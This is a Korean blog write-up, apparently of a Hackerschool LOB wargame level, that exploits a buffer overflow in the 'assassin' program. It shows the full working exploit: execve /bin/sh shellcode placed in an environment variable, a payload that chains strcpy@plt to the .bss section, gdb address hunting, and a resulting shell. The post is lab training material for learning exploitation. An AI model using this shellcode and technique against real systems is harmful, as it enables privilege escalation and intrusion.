본문 바로가기
System Hacking/해커스쿨 LOB

해커스쿨 LOB ( giant -> assassin ) by ORANG

ORANG(오랑) 2014. 10. 21. 16:36

LOB_giant



[giant@localhost giant]$ bash2

[giant@localhost giant]$ ls

assassin  assassin.c

[giant@localhost giant]$ cat assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - assassin

        - no stack, no RTL

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

char buffer[40];


if(argc < 2){

printf("argv error\n");

exit(0);

}


if(argv[1][47] == '\xbf')

{

printf("stack retbayed you!\n");

exit(0);

}


        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }


strcpy(buffer, argv[1]);

printf("%s\n", buffer);


        // buffer+sfp hunter

        memset(buffer, 0, 44);

}



bash2 띄우고, 힌트를 보니 이번에는 no stack, no RTL 입니다.

buffer와 sfp도 초기화시켜버리네요.


환경변수에 쉘코드를 올려두고,

strcpy@plt 를 이용해서 bss에 쉘코드를 써주고, bss 주소로 리턴시키겠습니다.


dummy(44) + strcpy + bss + bss + &shellcode  가 되겠네요ㅎㅎ



[giant@localhost tmp]$ objdump -h ./assassin | grep bss 

20 .bss          00000018  080496a0  080496a0  000006a0  2**2

 


bss의 주소



 0x80483a8 <strcpy> 


strcpy@plt 의 주소


[giant@localhost tmp]$ export ORANG=`perl -e 'print "\x90"x20, "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68

\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[giant@localhost tmp]$ echo $ORANG

11̀É1F̀1Ph//shh/binPS°

                                                  ̀

[giant@localhost tmp]$ ./getenv

0xbffffe1f


(gdb) x/40s 0xbffffe1f - 400

…생략…

0xbffffca1:  "ORANG=", '\220' <repeats 20 times>, "11\200\211\2111F\2001Ph//shh/bin\211PS\211\211°\013\200"

(gdb) x/s 0xbffffca7

0xbffffca7:  '\220' <repeats 20 times>, “11\200\211\2111F\2001Ph//shh/bin\211PS\211\211°\013\200”


쉘코드는 0xbffffca7에 위치


[giant@localhost tmp]$ ./assassin `perl -e 'print "A"x44, "\xa8\x83\x04\x08", "\xc0\x96\x04\x08","\xc0\x96\x04\x08","\xa7\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)


주소 오차로 인해 공격에 실패했습니다. core dump를 분석해보면..


(gdb) x/x 0xbffffe1b

0xbffffe1b: 0x90909090


쉘코드의 정확한 위치는 0xbffff1b가 되겠네요. 공격해보면..



[giant@localhost giant]$ ./assassin `perl -e 'print "A"x44, "\xa8\x83\x04\x08", "\xc0\x96\x04\x08","\xc0\x96\x04\x08","\x1b\xfe\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

bash$ id

uid=515(assassin) gid=514(giant) egid=515(assassin) groups=514(giant)

bash$ my-pass

euid = 515

pushing me away 


는 성공!!



저작자표시

'System Hacking > 해커스쿨 LOB' 카테고리의 다른 글

해커스쿨 LOB ( zombie_assassin -> succubus ) by ORANG  (0) 2014.10.21
해커스쿨 LOB ( assassin -> zombie_assassin ) by ORANG  (0) 2014.10.21
해커스쿨 LOB ( bugbear -> giant ) by ORANG - 브루트포싱  (0) 2014.10.21
해커스쿨 LOB ( darkknight -> bugbear ) by ORANG  (0) 2014.10.20
해커스쿨 LOB ( golem -> darkknight ) by ORANG - FPO  (1) 2014.10.20

'System Hacking/해커스쿨 LOB' Related Articles

티스토리툴바